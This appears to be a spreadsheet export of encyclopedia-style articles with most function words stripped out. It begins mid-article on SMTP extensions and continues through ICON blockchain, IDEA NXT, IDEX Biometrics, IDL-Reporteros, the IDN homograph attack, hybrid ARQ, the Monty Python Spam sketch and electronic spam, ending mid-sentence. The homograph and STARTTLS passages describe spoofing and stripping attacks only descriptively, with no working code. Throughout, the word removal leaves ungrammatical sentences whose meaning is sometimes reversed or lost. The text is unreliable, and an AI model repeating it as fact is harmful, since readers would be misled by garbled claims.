parameters verbs similarly marked. smtp commands case-insensitive. they presented capitalized form emphasis only. smtp server requires specific capitalization method violation standard. 8bitmime least following servers advertise 8bitmime extension: apache james (since 2.3.0a1) citadel (since 7.30) courier mail server gmail icewarp smtp service kerio connect lotus domino microsoft exchange server exchange server 2000) novell groupwise opensmtpd oracle communications messaging server postfix sendmail (since 6.57)the following servers configured advertise 8bitmime, perform conversion 8-bit data 7-bit connecting non-8bitmime relays: exim qmail translate eight-bit messages seven-bit making attempt relay 8-bit data non-8bitmime peers, required rfc. this cause problems practice, since virtually modern mail relays 8-bit clean. microsoft exchange server 2003 advertises 8bitmime default, relaying non-8bitmime peer results bounce. this allowed 6152 section smtp-auth smtp-auth extension provides access control mechanism. consists authentication step client effectively logs mail server process sending mail. servers support smtp-auth usually configured require clients extension, ensuring true identity sender known. smtp-auth extension defined 4954. smtp-auth used allow legitimate users relay mail denying relay service unauthorized users, spammers. necessarily guarantee authenticity either smtp envelope sender 2822 "from:" header. example, spoofing, sender masquerades someone else, still possible smtp-auth unless server configured limit message from-addresses addresses authed user authorized for. smtp-auth extension also allows mail server indicate another sender authenticated relaying mail. general requires recipient server trust sending server, meaning aspect smtp-auth rarely used internet. smtputf8 supporting servers include: postfix (version later) momentum (versions 3.6.5, later) sendmail (under development) exim (experimental 4.86 release) communigate version 6.2.2 courier-mta version halon version microsoft exchange server protocol revision 14.0 haraka servers. oracle communications messaging server release 8.0.2. security extensions mail delivery occur plain text encrypted connections, however communicating parties might know advance party's ability secure channel. starttls "opportunistic tls" starttls extensions enables supporting smtp servers notify connecting clients supports encrypted communication offers opportunity clients upgrade connection sending starttls command. servers supporting extension inherently gain security benefits implementation own, upgrading encrypted session dependent connecting client deciding exercise option, hence term opportunistic tls. starttls effective passive observation attacks, since starttls negotiation happens plain text active attacker trivially remove starttls commands. this type man-in-the-middle attack sometimes referred striptls, encryption negotiation information sent never reaches other. scenario parties take invalid unexpected responses indication properly support starttls, defaulting traditional plain-text mail transfer. note starttls also defined imap pop3 rfcs, protocols serve different purposes: smtp used communication message transfer agents, imap pop3 clients message transfer agents. 2014 electronic frontier foundation began "starttls everywhere" project that, similarly "https everywhere" list, allowed relying parties discover others supporting secure communication without prior communication. project stopped accepting submissions april 2021, recommended switching dane mta-sts discovering information peers' support.rfc 8314 officially declared plain text obsolete recommend always using tls, adding ports implicit tls. smtp strict transport security newer 2018 8461 called "smtp strict transport security (mta-sts)" aims address problem active adversary defining protocol mail servers declare ability secure channels specific files server specific records. relying party would regularly check existence record, cache amount time specified record never communicate insecure channels record expires. note mta-sts records apply smtp traffic mail servers communications user's client mail server protected transport layer security smtp/msa, imap, pop3, https combination organizational technical policy. essentially, mta-sts means extend policy third parties. april 2019 google mail announced support mta-sts. smtp reporting protocols designed securely deliver messages fail misconfigurations deliberate active interference, leading undelivered messages delivery unencrypted unauthenticated channels. 8460 "smtp reporting" describes reporting mechanism format sharing statistics specific information potential failures recipient domains. recipient domains information detect potential attacks diagnose unintentional misconfigurations. april 2019 google mail announced support smtp reporting. spoofing spamming original design smtp facility authenticate senders, check servers authorized send behalf, result email spoofing possible, commonly used email spam phishing. occasional proposals made modify smtp extensively replace completely. example internet mail 2000, neither made much headway face network effect huge installed base classic smtp. instead, mail servers range techniques, stricter enforcement standards 5322, domainkeys identified mail, sender policy framework dmarc, dnsbls greylisting reject quarantine suspicious emails. implementations related requests comments 1123 requirements internet hosts—application support (std 1870 smtp service extension message size declaration (оbsoletes: 1653) 2505 anti-spam recommendations smtp mtas (bcp 2821 simple mail transfer protocol 2920 smtp service extension command pipelining (std 3030 smtp service extensions transmission large binary mime messages 3207 smtp service extension secure smtp transport layer security (obsoletes 2487) 3461 smtp service extension delivery status notifications (obsoletes 1891) 3463 enhanced status codes smtp (obsoletes 1893, updated 5248) 3464 extensible message format delivery status notifications (obsoletes 1894) 3798 message disposition notification (updates 3461) 3834 recommendations automatic responses electronic mail 3974 smtp operational experience mixed ipv4/v6 environments 4952 overview framework internationalized email (updated 5336) 4954 smtp service extension authentication (obsoletes 2554, updates 3463, updated 5248) 5068 email submission operations: access accountability requirements (bcp 134) 5248 registry smtp enhanced mail system status codes (bcp 138) (updates 3463) 5321 simple mail transfer protocol (obsoletes 974, 1869, 2821, updates 1123) 5322 internet message format (obsoletes 2822) 5504 downgrading mechanism email address internationalization 6409 message submission mail (std (obsoletes 4409, 2476) 6522 multipart/report content type reporting mail system administrative messages (obsoletes 3462, turn 1892) 6531 smtp extension internationalized email addresses (updates 2821, 2822, 4952, 5336) 8314 cleartext considered obsolete: transport layer security (tls) email submission access also bounce address cram-md5 sasl mechanism esmtpa) 2195 email email encryption dkim ident list mail server software list smtp server return codes smtp smtp internet message access protocol binary content extension 3516 sender policy framework (spf) simple authentication security layer (sasl) 4422 smtp authentication variable envelope return path comparison email clients information smtp support notes references hughes, (1998). internet e-mail: protocols, standards implementation. artech house publishers. isbn 978-0-89006-939-4. hunt, (2003). sendmail cookbook. o'reilly media. isbn 978-0-596-00471-2. johnson, (2000). internet email protocols: developer's guide. addison-wesley professional. isbn 978-0-201-43288-6. loshin, (1999). essential email standards: rfcs protocols made practical. john wiley sons. isbn 978-0-471-34597-8. rhoton, (1999). programmer's guide internet mail: smtp, pop, imap, ldap. elsevier. isbn 978-1-55558-212-8. wood, (1999). programming internet mail. o'reilly. isbn 978-1-56592-479-6. external links 1869 smtp service extensions 5321 simple mail transfer protocol 4954 smtp service extension authentication (obsoletes 2554) 3848 smtp lmtp transmission types registration (with esmtpa) 6409 message submission mail (obsoletes 4409, obsoletes 2476)</t>
  </si>
  <si>
    <t>I2P</t>
  </si>
  <si>
    <t>ICON (blockchain platform)</t>
  </si>
  <si>
    <t>icon decentralized, open-source blockchain smart contract functionality. native cryptocurrency platform. history founding icon founded 2017 switzerland-based icon foundation. according icon white paper, vision icon introduce decentralization" "hyperconnect korea, asia, eventually, world". launch icon's initial coin offering (ico) september 2017 raised 150,000 (approximately us$43 million time).at time launch, icon supported various public private organizations, including seoul metropolitan government south korea, line corporation japan. icon november 2021, icon launched. changes included improved performance, java smart contract support, preparation future interoperability blockchain transmission protocol (btp).prior update, yahoo finance identified icon top-10 interoperability cryptocurrencies. design icon permissionless, non-hierarchical network computers (nodes) build growing series "blocks" transactions, known blockchain. each block contains identifier chain must precede block considered valid. icon's consensus mechanism called loop fault tolerance (lft), modified version byzantine fault tolerance (bft) consensus. nodes public representatives (p-reps), block generated approximately every seconds. icon designed scalable public private blockchain cases. applications decentralized finance decentralized finance (defi) case icon. offers traditional financial instruments decentralized architecture, outside companies' governments' control, money market funds users earn interest. decentralized finance applications accessed web3-enabled browser extension application, allows users directly interact icon blockchain website. many decentralized applications (dapps) connect work together create complex financial services. smart contracts smart contracts case icon. smart contract computer program transaction protocol intended automatically execute, control, document legally-relevant events actions, according terms contract agreement. objectives smart contracts reduction need trusted intermediators, arbitrations, enforcement costs, fraud losses, well reduction malicious accidental exceptions. non-fungible tokens (nfts) icon allows creation non-fungible tokens (nfts). since tokens type unique, used represent things collectibles, digital art, sports memorabilia, virtual real estate, items within games. land, buildings, avatars blockchain-based virtual worlds also bought sold nfts. also list cryptocurrencies bitcoin decentralized finance references</t>
  </si>
  <si>
    <t>IDEA NXT</t>
  </si>
  <si>
    <t>cryptography, idea algorithm (previously known fox) block cipher designed pascal junod serge vaudenay epfl (lausanne, switzerland). conceived 2001 2003. project originally named published 2003. 2005, announced mediacrypt name idea nxt. idea successor international data encryption algorithm (idea) also uses lai–massey scheme. mediacrypt holds patents elements idea idea nxt. cipher specified configurations: nxt64 (with block bits, bits, rounds) nxt128 (with block bits, bits, rounds). references external links specifications version 256bit ciphers ideanxt reference implementation derived code mediacrypt homepage idea licensor fox: family block ciphers algorithm implementation hardware design approach licensed software implementation idea u.s. patent application pub. 2004/0247117 u.s. patent application pub. 2005/0053233</t>
  </si>
  <si>
    <t>IDEX Biometrics</t>
  </si>
  <si>
    <t>idex biometrics asa, (ose: idex, nasdaq: idba) norwegian biometrics company, specialising fingerprint imaging fingerprint recognition technology. company founded 1996 headquartered oslo, main operation offices york massachusetts. company also offices china. idex offers fingerprint sensor biometric software identity cards, banking cards, smart cards, access control, healthcare, security solutions. fingerprint recognition form biometric identification, examples dna, face recognition, iris recognition retinal scan well identification based behavioral patterns speaker recognition, keystroke dynamics signature recognition. technology idex's smartfinger film sensor technology based polymer process technologies offers small, ultra-thin flexible swipe fingerprint sensors. idex holds early patents low-cost capacitive fingerprint sensors cross-licence apple relating technology.idex demonstrated mobile phone-related technology implementations running android platform well technology concept finger print sensors built cover glass mobile phones. finger recognition solutions apple iphone ipad using smartfinger launched.idex's technology also integrated biometric iso-compliant cards. fingerprint-based authentication payment cards gradually become main focus company's efforts commercialize technology.in march 2021, company started shipping trustedbio, generation sensors specifically targeting card market. global partners idex announced partnerships global companies including mastercard, idemia, chutian dragon, feitian, goldpac, hed, hengbao, excelsecu, infineon smart tech. references external links official website</t>
  </si>
  <si>
    <t>IDL-Reporteros</t>
  </si>
  <si>
    <t>idl-reporteros online newspaper based lima, peru specializes investigative journalism corruption peru promote transparency nation. since founding, newspaper initiated investigations throughout peru. history newspaper founded october 2009 veteran reporter gustavo gorriti, initially reporters. first main investigations occurred february 2010, report involving purchase armoured personnel carrier peruvian armed forces highly inflated price later spread national media outlets.idl-reporteros assisted international consortium investigative journalists journalistic research work involved 2021 pandora papers leak. recognition idl-reporteros member global investigative journalism network, supported open society foundations recognized ashoka changemaker part ashoka fellows project. human rights organizations venezuela, including provea transparency venezuela, expressed support collaborated newspaper. references</t>
  </si>
  <si>
    <t>IDN homograph attack</t>
  </si>
  <si>
    <t>internationalized domain name (idn) homograph attack malicious party deceive computer users remote system communicating with, exploiting fact many different characters look alike (i.e., homographs, hence term attack, although technically homoglyph accurate term different characters look alike). example, regular user example.com lured click link latin character replaced cyrillic character "а". this kind spoofing attack also known script spoofing. unicode incorporates numerous writing systems, and, number reasons, similar-looking characters greek latin cyrillic assigned code. their incorrect malicious usage possibility security attacks.the registration homographic domain names akin typosquatting, forms attacks similar-looking name established domain fool user. major difference typosquatting perpetrator attracts victims relying natural typographical errors commonly made manually entering url, homograph spoofing perpetrator deceives victims presenting visually indistinguishable hyperlinks. indeed, would rare accident user type, example, cyrillic letter within otherwise english word "citibаnk". there cases registration typosquatting homograph spoofing; pairs l/i, i/j, close together keyboards and, depending typeface, difficult impossible distinguish. history early nuisance kind, pre-dating internet even text terminals, confusion (lowercase letter "l") (the number "one") (capital letter vowel "o") (the number "zero"). some typewriters pre-computer even combined one; users type lowercase number needed. zero/o confusion gave rise tradition crossing zeros, computer operator would type correctly. unicode contribute greatly combining characters, accents, several types hyphen, etc., often inadequate rendering support, especially smaller font sizes wide variety fonts.even earlier, handwriting provided rich opportunities confusion. notable example etymology word "zenith". translation arabic "samt" included scribe's confusing "ni". this common medieval blackletter, connect vertical columns letters making difficult distinguish several row. latter, well "rn"/"m"/"rri" ("rn"/"m"/"rri") confusion, still possible human even modern advanced computer technology. intentional look-alike character substitution different alphabets also known various contexts. example, faux cyrillic used amusement attention-grabber "volapuk encoding", cyrillic script represented similar latin characters, used early days internet overcome lack support cyrillic alphabet. another example vehicle registration plates cyrillic (for domestic usage cyrillic script countries) latin (for international driving) letters. registration plates issued greece limited using letters greek alphabet homoglyphs latin alphabet, european union regulations require latin letters. homographs ascii ascii several characters pairs characters look alike known homographs homoglyphs). spoofing attacks based similarities known homograph spoofing attacks. example, (the number) (the letter), lowercase uppercase "i". typical example hypothetical attack, someone could register domain name appears almost identical existing domain goes somewhere else. example, domain "rnicrosoft.com" begins "n", "m". other examples g00gle.com looks much like google.com fonts. using uppercase lowercase characters, googie.com (capital small looks much like google.com fonts. paypal target phishing scam exploiting this, using domain paypai.com. certain narrow-spaced fonts tahoma (the default address windows xp), placing front produce homoglyphs homographs internationalized domain names multilingual computer systems, different logical characters identical appearances. example, unicode character u+0430, cyrillic small letter ("а"), look identical unicode character u+0061, latin small letter ("a") lowercase used english. hence wikipediа.org (xn--wikipedi-86g.org; cyrillic version) instead wikipedia.org (the latin version). problem arises different treatment characters user's mind computer's programming. from viewpoint user, cyrillic within latin string latin "a"; difference glyphs characters fonts. however, computer treats differently processing character string identifier. thus, user's assumption one-to-one correspondence visual appearance name named entity breaks down. internationalized domain names provide backward-compatible domain names full unicode character set, standard already widely supported. however system expanded character repertoire dozen characters single alphabet many thousands characters many scripts; greatly increased scope homograph attacks. this opens rich vein opportunities phishing varieties fraud. attacker could register domain name looks like legitimate website, letters replaced homographs another alphabet. attacker could send e-mail messages purporting come original site, directing people bogus site. spoof site could record information passwords account details, passing traffic real site. victims never notice difference, suspicious criminal activity occurs accounts. december 2001 evgeniy gabrilovich alex gontmakher, technion, israel, published paper titled "the homograph attack", described attack used unicode urls spoof website url. prove feasibility kind attack, researchers successfully registered variant domain name microsoft.com incorporated cyrillic characters. problems kind anticipated introduced, guidelines issued registries avoid reduce problem. example, advised registries accept characters latin alphabet country, unicode characters, advice neglected major tlds.on february 2005, slashdot reported exploit disclosed 3ric johanson hacker conference shmoocon. browsers supporting idna appeared direct http://www.pаypal.com/, first character replaced cyrillic site well known payment site paypal, actually spoofed site different content. popular browsers continued problems properly displaying international domain names april 2017.the following alphabets characters used spoofing attacks (please note, obvious common, given artistic license much risk spoofer take getting caught; possibilities numerous listed here): cyrillic cyrillic far, commonly used alphabet homoglyphs, largely contains lowercase glyphs identical nearly identical latin counterparts. cyrillic letters optical counterparts basic latin alphabet look close identical cyrillic resemble numerals italic type generates homoglyphs: дтпи дтпи (дтпи standard type), resembling dmnu fonts used, since italic form resembles lowercase however, mainstream fonts, instead resembles partial differential sign, capital letters counted, авсеніјкморѕтх substitute abcehijkmopstx, addition capitals lowercase cyrillic homoglyphs. cyrillic non-russian problematic letters bear resemblance other. cyrillic ӓёїӧ also used spoofed, fake äëïö. while komi (ԁ), shha (һ), palochka izhitsa bear strong resemblance latin letters either rare archaic widely supported standard fonts (they included wgl-4). attempting could cause ransom note effect. greek from greek alphabet, omicron sometimes appear identical latin alphabet letter lowercase used urls. fonts italic type feature greek alpha looking like latin this list increases close matches also allowed (such greek εικηρτυωχγ eiknptuwxy). using capital letters, list expands greatly. greek αβεηικμνορτχυζ looks identical latin abehikmnoptxyz. greek αγβεηκμοπρτφχ looks similar cyrillic агвенкмопртфх cyrillic greek certain geometric sans-serif fonts), greek letters look similar cyrillic besides greek similar cyrillic fonts, greek resembles cyrillic serbian alphabet, cyrillic also italicizes latin counterpart, making possible substitute alpha vice versa. lunate form sigma, resembles latin cyrillic spoofed, greek beta substitute german eszett fonts (and fact, code page treats equivalent), greek end-of-word-variant sigma accented greek substitutes usually used many fonts, last (alpha) resembling italic type. armenian armenian alphabet also contribute critical characters: several armenian characters like well capital often completely identical latin characters modern fonts, symbols similar enough pass off, ցհոօզս look like ghnoqu, resembles (albeit dotless), either resemble depending font; resemble cyrillic however, armenian luckily, less reliable: standard fonts feature armenian glyphs (whereas greek cyrillic scripts are); windows prior windows rendered armenian distinct font, sylfaen, mixing armenian latin would appear obviously different using font sylfaen unicode typeface. (this known ransom note effect.) current version tahoma, used windows supports armenian (previous versions not). furthermore, font differentiates latin armenian letters armenian (ձշ) also resemble number resembles another sometimes resembles number hebrew hebrew spoofing generally rare. only three letters alphabet reliably used: samekh (ס), sometimes resembles diacritic (וֹ), resembles heth (ח), resembles letter less accurate approximants alphanumerics also found, usually accurate enough purposes foreign branding substitution. furthermore, hebrew alphabet written right left trying left-to-right glyphs cause problems. thai though thai script historically distinct look numerous loops small flourishes, modern thai typography, beginning manoptica 1973 continuing plex modern era, increasingly adopted simplified style thai characters represented glyphs strongly resembling latin letters. (a), (n), (u), (u), (j), (w), (s), among thai glyphs closely resemble latin. chinese chinese language problematic homographs many characters exist traditional (regular script) simplified chinese characters. .org domain, registering variant renders unavailable anyone; .biz single chinese-language registration delivers variants active domains (which must domain name server registrant). (.香港) also adopts policy. other scripts other unicode scripts homographs found include number forms (roman numerals), compatibility enclosed letters months (certain abbreviations), latin (certain digraphs), currency symbols, mathematical alphanumeric symbols, alphabetic presentation forms (typographic ligatures). accented characters names differ accent character look similar, particularly substitution involves dotted letter tittle (dot) replaced diacritic (such grave accent acute accent; included standard character sets fonts) detected close inspection. top-level domain registries, wíkipedia.tld (xn--wkipedia-c2a.tld) wikipedia.tld different names held different registrants. exception .ca, reserving plain-ascii version domain prevents another registrant claiming accented version name. non-displayable characters unicode includes many characters displayed default, zero-width space. general, icann prohibits domain characters registered, regardless tld. known homograph attacks 2011, unknown source (registering name "completely anonymous") registered domain name homographic television station kboi-tv's create fake news website. sole purpose site spread april fool's joke regarding governor idaho issuing supposed sale music justin bieber.in september 2017, security researcher ankit anubhav discovered homograph attack attackers registered adoḅe.com deliver betabot trojan. defending attack client-side mitigation simplest defense browsers support idna similar mechanisms, users turn whatever support browsers have. that could mean blocking access idna sites, generally browsers permit access display idns punycode. either way, amounts abandoning non-ascii domain names. google chrome versions later algorithm similar used firefox. previous versions display characters belong (and one) user's preferred languages. chromium chromium-based browsers microsoft edge (since 2019) opera also algorithm. safari's approach render problematic character sets punycode. this changed altering settings system files. mozilla firefox versions later display idns either prevents homograph attacks restricting characters used domain names labels scripts different languages. otherwise idns displayed punycode. internet explorer versions later allow idns except labels scripts different languages. labels scripts displayed punycode. there exceptions locales ascii characters commonly mixed localized scripts. internet explorer capable using idns, imposes restrictions displaying non-ascii domain names based user-defined list allowed languages provides anti-phishing filter checks suspicious sites remote database known phishing sites. microsoft edge converts unicode punycode.as additional defense, internet explorer firefox above, opera 9.10 include phishing filters attempt alert users visit malicious websites. april 2017, several browsers (including chrome, firefox opera) displaying idns consisting purely cyrillic characters normally (not punycode), allowing spoofing attacks. chrome tightened restrictions version prevent attack.browser extensions like homo-graphs available google chrome firefox check whether user visiting website homograph another domain user-defined list.these methods defense extend within browser. homographic urls house malicious software still distributed, without displayed punycode, e-mail, social networking sites without detected user actually clicks link. while fake link show punycode clicked, point page already begun loading browser malicious software already downloaded onto computer. server-side/registry operator mitigation homographs database python library allows developers defend using machine learning-based character recognition.icann implemented policy prohibiting potential internationalized choosing letters could resemble existing latin thus used homograph attacks. proposed tlds (bulgaria), .укр (ukraine) (greece) rejected stalled perceived resemblance latin letters. three (and serbian .срб mongolian .мон) later accepted. three-letter considered safer two-letter tld, since harder match normal latin iso-3166 country domains; although potential match generic domains remains, generic domains expensive registering second- third-level domain address, making cost-prohibitive register homoglyphic sole purpose making fraudulent domains (which would draw icann scrutiny). russian registry operator coordination center accepts cyrillic names top-level domain .рф, forbidding latin greek characters. however problem .com gtlds remains open. also security issues unicode internationalized domain name homoglyph duplicate characters unicode unicode equivalence typosquatting references external links homograph attack generator phishing unicode domains</t>
  </si>
  <si>
    <t>Hybrid automatic repeat request</t>
  </si>
  <si>
    <t>hybrid automatic repeat request (hybrid harq) combination high-rate forward error correction (fec) automatic repeat request (arq) error-control. standard arq, redundant bits added data transmitted using error-detecting (ed) code cyclic redundancy check (crc). receivers detecting corrupted message request message sender. hybrid arq, original data encoded code, parity bits either immediately sent along message transmitted upon request receiver detects erroneous message. code omitted code used perform forward error correction (fec) addition error detection, reed–solomon code. code chosen correct expected subset errors occur, method used fall-back correct errors uncorrectable using redundancy sent initial transmission. result, hybrid performs better ordinary poor signal conditions, simplest form comes expense significantly lower throughput good signal conditions. there typically signal quality cross-over point simple hybrid better, basic better. simple hybrid simplest version harq, type harq, adds information message prior transmission. when coded data block received, receiver first decodes error-correction code. channel quality good enough, transmission errors correctable, receiver obtain correct data block. channel quality bad, transmission errors corrected, receiver detect situation using error-detection code, received coded data block rejected re-transmission requested receiver, similar arq.in sophisticated form, type harq, message originator alternates message bits along error-detecting parity bits parity bits. when first transmission received error free, parity bits never sent. also, consecutive transmissions combined error correction neither error free.to understand difference type type hybrid arq, consider size added information: error detection typically adds couple bytes message, incremental increase length. fec, hand, often double triple message length error correction parities. terms throughput, standard typically expends percent channel capacity reliable protection error, ordinarily expends half channel capacity channel improvement. standard transmission must received error free given transmission error detection pass. type hybrid arq, first transmission contains data error detection different standard arq). received error free, done. data received error, second transmission contain parities error detection. received error free, done. received error, error correction attempted combining information received transmissions. only type hybrid suffers capacity loss strong signal conditions. type hybrid bits transmitted subsequent re-transmissions needed. strong signal conditions, type hybrid performs good capacity standard arq. poor signal conditions, type hybrid performs good sensitivity standard fec. hybrid soft combining practice, incorrectly received coded data blocks often stored receiver rather discarded, re-transmitted block received, blocks combined. this called hybrid soft combining (dahlman al., 120). while possible given transmissions cannot independently decoded without error, happen combination previously erroneously received transmissions gives enough information correctly decode. there main soft combining methods harq: chase combining: every re-transmission contains information (data parity bits). receiver uses maximum-ratio combining combine received bits bits previous transmissions. because transmissions identical, chase combining seen additional repetition coding. could think every re-transmission adding extra energy received transmission increased eb/n0. incremental redundancy: every re-transmission contains different information previous one. multiple sets coded bits generated, representing information bits. re-transmission typically uses different coded bits previous transmission, different redundancy versions generated puncturing encoder output. thus, every re-transmission receiver gains extra information.several variants main methods exist. example, partial chase combining subset bits original transmission re-transmitted. partial incremental redundancy, systematic bits always included re-transmission self-decodable. example incremental redundancy harq hsdpa: data block first coded punctured turbo code, (re)transmission coded block usually punctured (i.e. fraction coded bits chosen) sent. puncturing pattern used (re)transmission different, different coded bits sent time. although hsdpa standard supports chase combining incremental redundancy, shown incremental redundancy almost always performs better chase combining, cost increased complexity.harq used stop-and-wait mode selective repeat mode. stop-and-wait simpler, waiting receiver's acknowledgment reduces efficiency. thus multiple stop-and-wait harq processes often done parallel practice: harq process waiting acknowledgment, another process channel send data. there forward error correction codes used harq scheme besides turbo codes, e.g. extended irregular repeat-accumulate (eira) code efficiently-encodable rate-compatible (e2rc) code, low-density parity-check codes. applications harq used hsdpa hsupa provide high speed data transmission downlink uplink, respectively) mobile phone networks umts, ieee 802.16-2005 standard mobile broadband wireless access, also known "mobile wimax". also used evolution-data optimized wireless networks. type hybrid used itu-t g.hn, high-speed local area network standard operate data rates gbit/s existing home wiring (power lines, phone lines coaxial cables). g.hn uses crc-32c error detection, ldpc forward error correction selective repeat arq. references further reading soljanin, emina; ruoheng liu; predrag spasojevic (2004). "hybrid random transmission assignments". advances network information theory. providence, rhode island: american mathematical society. 321–334. isbn 0-8218-3467-3. retrieved march 2009. also available preprint. comroe, costello (july 1984). "arq schemes data transmission mobile radio systems". ieee journal selected areas communications. (4): 472–481. doi:10.1109/jsac.1984.1146084. davida, george sudhakar reddy (september 1972). "forward error correction decision feedback". information control. (2): 117–133. doi:10.1016/s0019-9958(72)90057-5. "rate matching harq (wcdma/hsdpa)". rate matching harq (wcdma/hsdpa). dahlman, erik; parkvall, stefan; sköld, johan; beming, (2008). evolution hspa mobile broadband ed.). academic press. 119–123. isbn 978-0-12-374538-5.</t>
  </si>
  <si>
    <t>Spam (Monty Python)</t>
  </si>
  <si>
    <t>"spam" monty python sketch, first televised 1970 written terry jones michael palin. sketch, customers lowered wires greasy spoon café order breakfast menu includes spam almost every dish, much consternation customers. waitress recites spam-filled menu, group viking patrons drown conversations song, repeating "spam, spam, spam, spam… lovely spam! wonderful spam!".the excessive amount spam probably reference ubiquity imported canned meat products united kingdom world period rationing country struggled rebuild agricultural base. thanks wartime ubiquity, british public grown tired it.the televised sketch several subsequent performances feature terry jones waitress, eric idle graham chapman mrs. bun, like spam. original sketch also featured john cleese hungarian palin historian, part left audio version sketch recorded team's second album another monty python record (1971). year later track released pythons' first single. term spam unsolicited electronic communications derived sketch. plot three-and-a-half-minute sketch fictional green midget cafe bromley. argument develops waitress, recites menu nearly every dish contains spam, mrs. bun, like spam. asks dish without spam, much amazement spam-loving husband. waitress responds request disgust. offers take spam instead, asks dish containing spam baked beans. waitress says beans available; asks substitution spam, waitress begins reading dish's name. several points, group vikings restaurant interrupt conversations loudly singing spam. irate waitress orders shut resume singing loudly. hungarian tourist comes counter, trying order using wholly inaccurate hungarian/english phrasebook reference previous sketch). rapidly escorted away police constable. sketch abruptly cuts historian television studio talking origin vikings café. goes begins increasingly insert word "spam" every sentence, backdrop raised reveal restaurant behind. historian joins vikings song, mrs. lifted wires scene singing continues. original televised performance, closing credits begin scroll singing still audible background. production notes sketch premiered december 1970 final sketch 25th show monty python's flying circus, credits episode changed every member crew either spam food item menu added names. (spam terry jones, michael spam palin, john spam john spam john spam cleese, graham spam spam spam chapman, eric spam chips idle, terry spam sausage spam spam gilliam, etc.) "spam" sketch became immensely popular, ranked fifth favourite python sketch poll. word "spam" uttered least times. vikings' spam song parody "the viking song" samuel coleridge-taylor. this sketch also featured several monty python videos including parrot sketch included years monty python. lead sheet song appears monty python's book. release episode contains deliberate subtitling error. when hungarian tries order food, words lower intestine full spam, egg, spam, bacon, spam, tomatoes, spam." subtitles read "your intestine full sperm." this continuation "dirty hungarian phrasebook" sketch episode.the audio version sketch excludes hungarian historian, instead vikings reaching dramatic crescendo. waitress, resigned disruptions, mutters "bloody vikings!" 2014 version sketch performed monty python live (mostly), vikings replies "racist bastard!" leading group operatic chorus includes sampling "finland" team's contractual obligation album. spam popular food world wartime teenager grantham, lincolnshire, margaret thatcher remembered excitement opening spam boxing lunch. although rationed, generally easily available subject supply shortages, meats. thanks wartime ubiquity, british public eventually tired menu bacon egg, sausage bacon spam egg, bacon spam egg, bacon, sausage spam spam, bacon, sausage spam spam, egg, spam, spam, bacon spam spam, spam, spam, spam spam, sausage, spam, spam, spam, bacon, spam, tomato spam (vinyl record) spam, spam, spam, spam, spam, spam, spam, baked beans, spam, spam, spam spam lobster thermidor crevettes mornay sauce, garnished truffle pâté, brandy fried top, spam. (television broadcast)(lobster thermidor crevettes mornay sauce, served provençale manner shallots aubergines, garnished truffle pâté, brandy fried spam. (vinyl record) impact phenomenon, years later, marketers drowning discourse flooding usenet newsgroups individuals' email junk mail advertising messages named spamming, early internet users flooded forums word spam recounting repetitive unwanted presence spam sketch. this phenomenon reported court decisions handed lawsuits spammers see, example, compuserve inc. cyber promotions, inc., f.supp. 1015, (s.d.ohio 1997). furthermore, referenced electronic frontier foundation amicus curiae brief supreme court united states 2014. term also used refer mass marketing using junk phone calls text messages, since entered video game culture term refer producing large quantity something, rocket-spamming grenade-spamming. python programming language, named monty python, prefers spam, ham, eggs metasyntactic variables, instead traditional foo, baz. hormel's response spam makers hormel, never happy word spam junk email (which also happens derived sketch), supportive monty python sketch. hormel issued special spam broadway premiere eric idle's musical spamalot based monty python holy grail. sketch part company's spam museum austin, minnesota, united states, also mentioned spam's on-can advertisements product's 70th anniversary 2007 although date python sketch incorrectly stated 1971 instead 1970.in 2007 company decided publicity part corporate image, sponsored game product strongly associated monty python, featuring product "stinky french garlic" part promotion spamalot. company's 75th anniversary 2012, introduced can-a-lot, knight character, appearing product's packaging phrase "glorious spam®!". also olympia cafe references external links brad templeton april 2005). "origin term "spam" mean abuse". brad templeton. retrieved january 2007.</t>
  </si>
  <si>
    <t>Spam (electronic)</t>
  </si>
  <si>
    <t>spamming messaging systems send multiple unsolicited messages (spam) large numbers recipients purpose commercial advertising, purpose non-commercial proselytizing, prohibited purpose (especially fraudulent purpose phishing), simply repeatedly sending message user. while widely recognized form spam email spam, term applied similar abuses media: instant messaging spam, usenet newsgroup spam, search engine spam, spam blogs, wiki spam, online classified spam, mobile phone messaging spam, internet forum spam, junk transmissions, social spam, spam mobile apps, television advertising file sharing spam. named spam, luncheon meat, monty python sketch restaurant spam almost every dish vikings annoyingly sing "spam" repeatedly.spamming remains economically viable advertisers operating costs beyond management mailing lists, servers, infrastructures, ranges, domain names, difficult hold senders accountable mass mailings. costs, lost productivity fraud, borne public internet service providers, added extra capacity cope volume. spamming subject legislation many jurisdictions.a person creates spam called spammer. etymology term spam derived 1970 "spam" sketch sketch comedy television series monty python's flying circus. sketch, cafe, waitress reading menu every item includes spam canned luncheon meat. waitress recites spam-filled menu, chorus viking patrons drown conversations song, repeating "spam, spam, spam, spam… lovely spam! wonderful spam!".in 1980s term adopted describe certain abusive users frequented bbss muds, would repeat "spam" huge number times scroll users' text screen. early chat-room services like peoplelink early days online america (later known america online aol), actually flooded screen quotes monty python sketch. this used tactic insiders group wanted drive newcomers room usual conversation could continue. also used prevent members rival groups chatting—for instance, star wars fans often invaded star trek chat rooms, filling space blocks text star trek fans left.it later came used usenet mean excessive multiple posting—the repeated posting message. unwanted message would appear many, newsgroups, spam appeared menu items monty python sketch. earliest people "spam" sense joel furr. this also become established—to "spam" usenet flood newsgroups junk messages. word also attributed flood "make money fast" messages clogged many newsgroups 1990s. 1998, oxford dictionary english, previously defined "spam" relation trademarked food product, added second definition entry "spam": "irrelevant inappropriate messages sent internet large number newsgroups users." there also effort differentiate types newsgroup spam. messages crossposted many newsgroups once, opposed posted frequently, called "velveeta" (after cheese product), term persist. history pre-internet late 19th century, western union allowed telegraphic messages network sent multiple destinations. first recorded instance mass unsolicited commercial telegram 1864, british politicians received unsolicited telegram advertising dentist. history earliest documented spam (although term coined) message advertising availability model digital equipment corporation computers sent gary thuerk recipients arpanet 1978. rather send separate message person, standard practice time, assistant, carl gartley, write single mass email. reaction community fiercely negative, spam generate sales.spamming practiced prank participants multi-user dungeon games, fill rivals' accounts unwanted electronic junk.the first major commercial spam incident started march 1994, husband wife team lawyers, laurence canter martha siegel, began using bulk usenet posting advertise immigration services. incident commonly termed "green card spam", subject line postings. defiant face widespread condemnation, attorneys claimed detractors hypocrites "zealouts", claimed free speech right send unwanted commercial messages, labeled opponents "anti-commerce radicals". couple wrote controversial book entitled make fortune information superhighway.an early example nonprofit fundraising bulk posting usenet also occurred 1994 behalf citihope, attempting raise funds rescue children risk bosnian war. however, violation terms service, panix deleted bulk posts usenet, missing three copies. within years, focus spamming (and anti-spam efforts) 